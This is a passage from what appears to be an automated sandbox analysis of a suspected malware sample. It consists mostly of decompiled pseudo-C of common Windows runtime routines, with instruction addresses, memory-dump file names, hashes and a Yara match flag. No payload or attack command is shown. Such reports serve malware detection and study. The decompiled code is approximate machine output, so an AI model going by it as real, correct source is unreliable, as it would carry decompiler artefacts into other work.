										_t66 = E04C09063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04B3922A(_t82);
							_t53 = E04B57D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04C08B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4c286c0; // 0x9307b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4c286b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4c286bc;
										_t72 = 0x4c286b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04B39240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4c286c4;
									_t72 = 0x4c286c0;
									L18:
									E04B69B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                                    0x04b39100
                                                                                                                                    0x04b39100
                                                                                                                                    0x04b39100
                                                                                                                                    0x04b39100
                                                                                                                                    0x04b39102
                                                                                                                                    0x04b39107
                                                                                                                                    0x04b3910c
                                                                                                                                    0x04b39110
                                                                                                                                    0x04b39115
                                                                                                                                    0x04b39136
                                                                                                                                    0x04b39143
                                                                                                                                    0x04b937e4
                                                                                                                                    0x04b937e4
                                                                                                                                    0x04b39149
                                                                                                                                    0x04b3914e
                                                                                                                                    0x04b3914e
                                                                                                                                    0x04b39117
                                                                                                                                    0x04b3911d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b3911f
                                                                                                                                    0x04b39125
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39151
                                                                                                                                    0x04b39158
                                                                                                                                    0x04b3915d
                                                                                                                                    0x04b39161
                                                                                                                                    0x04b39168
                                                                                                                                    0x04b93715
                                                                                                                                    0x00000000
                                                                                                                                    0x04b3916e
                                                                                                                                    0x04b3916e
                                                                                                                                    0x04b39175
                                                                                                                                    0x04b39177
                                                                                                                                    0x04b3917e
                                                                                                                                    0x04b3917f
                                                                                                                                    0x04b39182
                                                                                                                                    0x04b39182
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b3918a
                                                                                                                                    0x04b3918d
                                                                                                                                    0x04b3918f
                                                                                                                                    0x04b39192
                                                                                                                                    0x04b39195
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b3919a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9371f
                                                                                                                                    0x04b93721
                                                                                                                                    0x04b93727
                                                                                                                                    0x04b9372f
                                                                                                                                    0x04b93733
                                                                                                                                    0x04b93735
                                                                                                                                    0x04b93738
                                                                                                                                    0x04b9373b
                                                                                                                                    0x04b9373d
                                                                                                                                    0x04b93740
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93746
                                                                                                                                    0x04b93749
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9374f
                                                                                                                                    0x04b93751
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93757
                                                                                                                                    0x04b93759
                                                                                                                                    0x04b9375c
                                                                                                                                    0x04b9375c
                                                                                                                                    0x04b9375e
                                                                                                                                    0x04b9375e
                                                                                                                                    0x04b93761
                                                                                                                                    0x04b93764
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93766
                                                                                                                                    0x04b93768
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a5
                                                                                                                                    0x04b937a7
                                                                                                                                    0x04b937ad
                                                                                                                                    0x04b937b0
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b937bc
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b3918a
                                                                                                                                    0x04b3918d
                                                                                                                                    0x04b3918f
                                                                                                                                    0x04b39192
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376f
                                                                                                                                    0x04b93775
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93777
                                                                                                                                    0x04b93779
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93782
                                                                                                                                    0x04b93787
                                                                                                                                    0x04b93789
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b93792
                                                                                                                                    0x04b93795
                                                                                                                                    0x04b93795
                                                                                                                                    0x04b93798
                                                                                                                                    0x04b93798
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b391a3
                                                                                                                                    0x04b391a9
                                                                                                                                    0x04b391b0
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391bb
                                                                                                                                    0x04b391c0
                                                                                                                                    0x04b391c5
                                                                                                                                    0x04b391c7
                                                                                                                                    0x04b937da
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391d2
                                                                                                                                    0x04b391d5
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b391d7
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b391e1
                                                                                                                                    0x04b391e7
                                                                                                                                    0x04b391fd
                                                                                                                                    0x04b39203
                                                                                                                                    0x04b3921e
                                                                                                                                    0x04b39223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39223
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39208
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391ee
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391e7
                                                                                                                                    0x00000000
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39168

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4e8804660181c554bccf7217f06dafd8435bb5b7cfa0433ec8da31ee2c06cd8a
                                                                                                                                    • Instruction ID: 27dff06d395bc23475c9166ed2eaeedec60a45cd4f0ea13942ddfa89e217ed18
                                                                                                                                    • Opcode Fuzzy Hash: 4e8804660181c554bccf7217f06dafd8435bb5b7cfa0433ec8da31ee2c06cd8a
                                                                                                                                    • Instruction Fuzzy Hash: 3F3190B5A01A44AFEB25EF69C588BACB7F1FB48315F148299C40577281C3B5BD90CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B790AF, Relevance: .1, Instructions: 76COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E04B790AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04B8D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04B6E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04B54620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04B7F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04B6A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                    0x04b790af
                                                                                                                                    0x04b790b8
                                                                                                                                    0x04b790bb
                                                                                                                                    0x04b790bf
                                                                                                                                    0x04b790c2
                                                                                                                                    0x04b790c2
                                                                                                                                    0x04b790c8
                                                                                                                                    0x04b790cb
                                                                                                                                    0x04b790cd
                                                                                                                                    0x04bb14d7
                                                                                                                                    0x04bb14eb
                                                                                                                                    0x04bb14eb
                                                                                                                                    0x00000000
                                                                                                                                    0x04bb14eb
                                                                                                                                    0x04bb14db
                                                                                                                                    0x04bb14e6
                                                                                                                                    0x00000000
                                                                                                                                    0x04bb14f2
                                                                                                                                    0x04bb14e8
                                                                                                                                    0x00000000
                                                                                                                                    0x04bb14e8
                                                                                                                                    0x04b790d8
                                                                                                                                    0x04b790da
                                                                                                                                    0x04b790dd
                                                                                                                                    0x04b790e5
                                                                                                                                    0x00000000
                                                                                                                                    0x04b79139
                                                                                                                                    0x04b790fa
                                                                                                                                    0x04b790fe
                                                                                                                                    0x04b79142
                                                                                                                                    0x00000000
                                                                                                                                    0x04b79142
                                                                                                                                    0x04b79104
                                                                                                                                    0x04b79107
                                                                                                                                    0x04b7910b
                                                                                                                                    0x04b79110
                                                                                                                                    0x04b79118
                                                                                                                                    0x04b79147
                                                                                                                                    0x04b79148
                                                                                                                                    0x04b7914f
                                                                                                                                    0x04b79150
                                                                                                                                    0x04b79151
                                                                                                                                    0x04b79152
                                                                                                                                    0x04b79156
                                                                                                                                    0x04b7915d
                                                                                                                                    0x04b79160
                                                                                                                                    0x04b79168
                                                                                                                                    0x04b7916c
                                                                                                                                    0x04b791bc
                                                                                                                                    0x04b791be
                                                                                                                                    0x00000000
                                                                                                                                    0x04b791be
                                                                                                                                    0x04b7916e
                                                                                                                                    0x04b79173
                                                                                                                                    0x04b79176
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b7917c
                                                                                                                                    0x04b79180
                                                                                                                                    0x04b791b5
                                                                                                                                    0x00000000
                                                                                                                                    0x04b791b5
                                                                                                                                    0x04b79182
                                                                                                                                    0x04b79185
                                                                                                                                    0x04b79189
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b7918e
                                                                                                                                    0x04b79190
                                                                                                                                    0x04b79198
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b791a0
                                                                                                                                    0x00000000
                                                                                                                                    0x04b791ad
                                                                                                                                    0x04b791ad
                                                                                                                                    0x04b791b0
                                                                                                                                    0x04b791b1
                                                                                                                                    0x00000000
                                                                                                                                    0x04b79185
                                                                                                                                    0x04b7911a
                                                                                                                                    0x04b7911c
                                                                                                                                    0x04b7911f
                                                                                                                                    0x04b79125
                                                                                                                                    0x04b79127
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                    • Instruction ID: 188ebe0a191c0e063ca1b2f10e36bae5336cba51ba4b50c247f7976be05361e2
                                                                                                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                    • Instruction Fuzzy Hash: C32165B5A00204EFEB20DF59C444EAAF7F8EB44354F1588AAE95597650D370FD50CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C0070D, Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                    			E04C0070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04C007DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04BFAFDE( &_v8,  &_v12);
					E04C01293(_t38, _v28, _t60);
					if(E04B57D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04BF14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                                    0x04c0071b
                                                                                                                                    0x04c00724
                                                                                                                                    0x04c00734
                                                                                                                                    0x04c00738
                                                                                                                                    0x04c0074b
                                                                                                                                    0x04c0074b
                                                                                                                                    0x04c00753
                                                                                                                                    0x04c00753
                                                                                                                                    0x04c00759
                                                                                                                                    0x04c0075d
                                                                                                                                    0x04c00774
                                                                                                                                    0x04c00779
                                                                                                                                    0x04c0077d
                                                                                                                                    0x04c00789
                                                                                                                                    0x04c00795
                                                                                                                                    0x04c007a7
                                                                                                                                    0x04c00797
                                                                                                                                    0x04c007a0
                                                                                                                                    0x04c007a0
                                                                                                                                    0x04c007af
                                                                                                                                    0x04c007c4
                                                                                                                                    0x04c007cd
                                                                                                                                    0x04c007cd
                                                                                                                                    0x04c007af
                                                                                                                                    0x04c007dc

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                    • Instruction ID: 643065424df2ff91e99a5f2619fdb6548e7ab024a4387ba3bf57a528b3b39faa
                                                                                                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                    • Instruction Fuzzy Hash: E721F2362042009FD705DF1DD880B6ABBE6EBC4350F04C569F9958B381DA34E909CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C37F, Relevance: .1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 636c5b3cdbe3bf0bd01692a8a6859876b0f871e1725eda9b07efa7b47f4081d6
                                                                                                                                    • Instruction ID: 9d4a82df9441d3a5b5247b1347d03caf8482461271b9425ba3e9f0871af5f0ce
                                                                                                                                    • Opcode Fuzzy Hash: 636c5b3cdbe3bf0bd01692a8a6859876b0f871e1725eda9b07efa7b47f4081d6
                                                                                                                                    • Instruction Fuzzy Hash: 07110476A102808BC3129B39DC81ED3FBB8EF42314F00069EE5595B0C3E7756525C391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B39240, Relevance: .1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E04B39240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4c0f708);
				E04B8D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04B795D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04B795D0();
				_t33 =  *0x4c284c4; // 0x0
				L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4c284c4; // 0x0
				L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4c284c4; // 0x0
				E04B52280(L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c286b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04B795D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04B795D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04B39325();
					_t50 =  *0x4c284c4; // 0x0
					return E04B8D0D1(L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                    0x04b39240
                                                                                                                                    0x04b39242
                                                                                                                                    0x04b39247
                                                                                                                                    0x04b3924c
                                                                                                                                    0x04b3924e
                                                                                                                                    0x04b39255
                                                                                                                                    0x04b39257
                                                                                                                                    0x04b3925a
                                                                                                                                    0x04b3925f
                                                                                                                                    0x04b3925f
                                                                                                                                    0x04b39266
                                                                                                                                    0x04b39271
                                                                                                                                    0x04b39276
                                                                                                                                    0x04b39279
                                                                                                                                    0x04b3927e
                                                                                                                                    0x04b39295
                                                                                                                                    0x04b3929a
                                                                                                                                    0x04b392b1
                                                                                                                                    0x04b392b6
                                                                                                                                    0x04b392d7
                                                                                                                                    0x04b392dc
                                                                                                                                    0x04b392e0
                                                                                                                                    0x04b392e6
                                                                                                                                    0x04b392e8
                                                                                                                                    0x04b392ee
                                                                                                                                    0x04b39332
                                                                                                                                    0x04b39333
                                                                                                                                    0x04b39337
                                                                                                                                    0x04b39338
                                                                                                                                    0x04b3933a
                                                                                                                                    0x04b3933a
                                                                                                                                    0x04b3933d
                                                                                                                                    0x04b39342
                                                                                                                                    0x04b39342
                                                                                                                                    0x04b39345
                                                                                                                                    0x04b39349
                                                                                                                                    0x04b3934e
                                                                                                                                    0x04b39352
                                                                                                                                    0x04b39357
                                                                                                                                    0x04b392f4
                                                                                                                                    0x04b392f4
                                                                                                                                    0x04b392f6
                                                                                                                                    0x04b392f9
                                                                                                                                    0x04b39300
                                                                                                                                    0x04b39306
                                                                                                                                    0x04b39324
                                                                                                                                    0x04b39324

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2cb3a4a1341292e041356fb35420071ebff156843fee130f999901c7359bf51f
                                                                                                                                    • Instruction ID: 313dc4b665c9f1b586648dc77ec85e42a16f34d5edf6bff7fbb9373e477f161d
                                                                                                                                    • Opcode Fuzzy Hash: 2cb3a4a1341292e041356fb35420071ebff156843fee130f999901c7359bf51f
                                                                                                                                    • Instruction Fuzzy Hash: 332148B2151A40DFD722EF28CA50F59BBB9FF08708F0446A8A049876B1CB75F941CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BB46A7, Relevance: .1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E04BB46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04B7F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04B6D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04B577F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                                    0x04bb46b7
                                                                                                                                    0x04bb46ba
                                                                                                                                    0x04bb46c5
                                                                                                                                    0x04bb46c8
                                                                                                                                    0x04bb46d0
                                                                                                                                    0x04bb46d4
                                                                                                                                    0x04bb46e6
                                                                                                                                    0x04bb46e9
                                                                                                                                    0x04bb46f4
                                                                                                                                    0x04bb46ff
                                                                                                                                    0x04bb4705
                                                                                                                                    0x04bb4706
                                                                                                                                    0x04bb470c
                                                                                                                                    0x04bb4713
                                                                                                                                    0x04bb471b
                                                                                                                                    0x04bb4723
                                                                                                                                    0x04bb4725
                                                                                                                                    0x04bb46d6
                                                                                                                                    0x04bb46d9
                                                                                                                                    0x04bb46db
                                                                                                                                    0x04bb46db
                                                                                                                                    0x04bb4732

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                    • Instruction ID: 5fb4c55e373d0fcacd557d3f67cb373c4952df3dd02f8e45805b5d1b9b40bb68
                                                                                                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                    • Instruction Fuzzy Hash: 28110272604208BBDB019F5CD8809BEBBB9EF85304F1080AAF9848B351DA319D51D7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B39080, Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                    			E04B39080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4c285ec;
				E04B52280(_t48, 0x4c285ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04B4FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4c2538c; // 0x771c6888
					if( *_t84 != 0x4c25388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4c0f6e8);
						E04B8D0E8(0x4c285ec, _t97, _t102);
